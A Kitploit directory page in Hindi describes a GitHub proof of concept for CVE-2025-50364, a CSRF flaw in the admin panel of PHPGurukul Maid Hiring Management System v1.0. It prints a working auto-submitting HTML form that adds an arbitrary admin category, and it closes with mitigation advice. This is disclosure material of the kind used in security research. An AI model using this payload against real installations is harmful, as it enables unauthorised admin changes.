Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-50364_CSRF_ADD_CATEGORY-phpgurukul-CVE — PHPGurukul Maid Hiring Management System v1.0 में CVE-2025-50364 को लक्षित करने वाला प्रमाण-की-अवधारणा CSRF शोषण जो क्राफ्टेड HTML फॉर्म के माध्यम से मनमाने व्यवस्थापक श्रेणियां जोड़ता है। | Kitploit
उपकरण/GitHubGitHub/1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHub1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve

CVE-2025-50364_CSRF_ADD_CATEGORY-phpgurukul-CVE

PHPGurukul Maid Hiring Management System v1.0 में CVE-2025-50364 को लक्षित करने वाला प्रमाण-की-अवधारणा CSRF शोषण जो क्राफ्टेड HTML फॉर्म के माध्यम से मनमाने व्यवस्थापक श्रेणियां जोड़ता है।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

परियोजना का नाम और रेपो URL: नौकरानी किराया प्रबंधन प्रणाली PHP और MySQL का उपयोग करके

भेद्यता प्रकार: क्लाइंट साइड अनुरोध जालसाजी

प्रभावित संस्करण: v1.0

💣भेद्यता विवरण: PHPGurukul किराया प्रबंधन प्रणाली के एडमिन पैनल में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता मौजूद है, जो एक हमलावर को एक प्रमाणित व्यवस्थापक को दुर्भावनापूर्ण साइट पर जाने के लिए धोखा देकर मनमानी किराया श्रेणियां जोड़ने की अनुमति देती है। इससे डेटा प्रदूषण और अनधिकृत व्यवस्थापक-स्तर परिवर्तन हो सकते हैं।

👩‍💻प्रभाव: अनधिकृत श्रेणी निर्माण

🛜प्रमाण-अवधारणा (PoC)

  1. एक श्रेणी जोड़ने की कार्यक्षमता थी जहां केवल प्रमाणित व्यवस्थापक ही श्रेणी जोड़ सकता था। 1
  2. एंडपॉइंट /admin/add-category.php पर POST अनुरोध भेजने के लिए HTML कोड CSRF-POC 2
root@kitploit:~
<html>
  <body>
    <form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
      <input type="hidden" name="catname" value="CSRF&#45;POC" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
  1. HTML कोड का उपयोग करें और एक दुर्भावनापूर्ण URL बनाएं। 3
  2. व्यवस्थापक द्वारा लिंक पर क्लिक करने के बाद, नई श्रेणी जोड़ दी जाएगी। 4 5

सिफारिश: एडमिन फॉर्म में CSRF टोकन लागू करें, SameSite कुकीज़ लागू करें, और अनधिकृत कार्रवाइयों को रोकने के लिए अनुरोध मूल को मान्य करें।

टूल डाउनलोड करें